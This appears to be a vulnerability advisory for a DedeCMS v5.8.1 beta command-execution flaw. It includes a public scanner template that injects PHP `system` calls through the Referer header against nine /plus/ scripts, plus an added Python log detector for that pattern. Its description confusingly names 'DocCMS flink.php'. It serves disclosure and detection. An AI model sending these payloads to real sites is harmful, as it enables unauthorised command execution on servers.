dedecms-common-func-rce: DedeCMS common.func.php Remote Command Execution Vulnerability

Date: 2025-09-01 | Affected software: DedeCMS | POC: Public

Vulnerability Description

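A remote command execution vulnerability exists in the DocCMS flink.php file; an attacker can exploit it to execute arbitrary commands. Affected: DedeCMS v5.81 beta (internal test release). fofa-query: "DedeCMS_V5.8.1"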

PoC Code [Public]

id: dedecms-common-func-rce

info:
  name: DedeCMS common.func.php 远程命令执行漏洞
  author: daffainfo
  severity: critical
  description: |
    DocCMS flink.php 文件存远程命令执行漏洞,攻击者通过漏洞可以执行任意命令。漏洞影响:DedeCMS v5.81 beta 内测版
    fofa-query: "DedeCMS_V5.8.1"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/DedeCMS%20common.func.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /plus/flink.php?dopost=save
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r1:
    request:
      method: GET
      path: /plus/users_products.php?oid=1337
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r2:
    request:
      method: GET
      path: /plus/download.php?aid=1337
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r3:
    request:
      method: GET
      path: /plus/showphoto.php?aid=1337
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r4:
    request:
      method: GET
      path: /plus/users-do.php?fmdo=sendMail
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r5:
    request:
      method: GET
      path: /plus/posttocar.php?id=1337
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r6:
    request:
      method: GET
      path: /plus/vote.php?dopost=view
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r7:
    request:
      method: GET
      path: /plus/carbuyaction.php?do=clickout
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"(ls);?>
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
  r8:
    request:
      method: GET
      path: /plus/recommend.php?c=dir
      headers:
        Accept: "*/*"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Referer: <?php "system"($c);/*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8()
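
A defender-side check for the request pattern this PoC sends (PHP code in the Referer header), as an added example that is not part of the original page or of the PoC author's code. It scans access-log lines in Combined Log Format; the function name `find_suspicious` and the sample log lines are constructed for illustration.

```python
import re

# Combined Log Format. Quoted fields may hold escaped quotes:
# Apache logs a literal " as \" and nginx logs it as \x22.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)"'
)
# A genuine Referer is a URL, so a PHP open tag in it is never legitimate.
PHP_TAG_RE = re.compile(r'<\?(?:php|=)', re.IGNORECASE)
# Script paths taken from the request paths in the PoC rules above.
POC_SCRIPTS = {"/plus/" + n for n in (
    "flink.php", "users_products.php", "download.php", "showphoto.php",
    "users-do.php", "posttocar.php", "vote.php", "carbuyaction.php",
    "recommend.php")}

def find_suspicious(lines):
    """Return one dict per request whose Referer carries a PHP open tag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not PHP_TAG_RE.search(m["referer"]):
            continue
        script = m["uri"].split("?", 1)[0]
        hits.append({
            "ip": m["ip"],
            "script": script,
            "known_poc_path": script in POC_SCRIPTS,
            # The PoC only counts a 200 response as a hit; triage those first.
            "served_200": m["status"] == "200",
        })
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    r'203.0.113.5 - - [01/Sep/2025:10:00:00 +0000] "GET /plus/flink.php HTTP/1.1" 200 512 "https://example.com/" "Mozilla/5.0"',
    r'198.51.100.7 - - [01/Sep/2025:10:00:05 +0000] "GET /plus/flink.php?dopost=save HTTP/1.1" 200 2048 "<?php \"system\"(ls);?>" "Mozilla/5.0"',
    r'198.51.100.7 - - [01/Sep/2025:10:00:06 +0000] "GET /plus/list.php?tid=1 HTTP/1.1" 404 0 "<?PHP \x22system\x22($c);/*" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

The same match on the Referer header can be used as a blocking rule at a reverse proxy or WAF, since no legitimate client sends a PHP open tag there.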
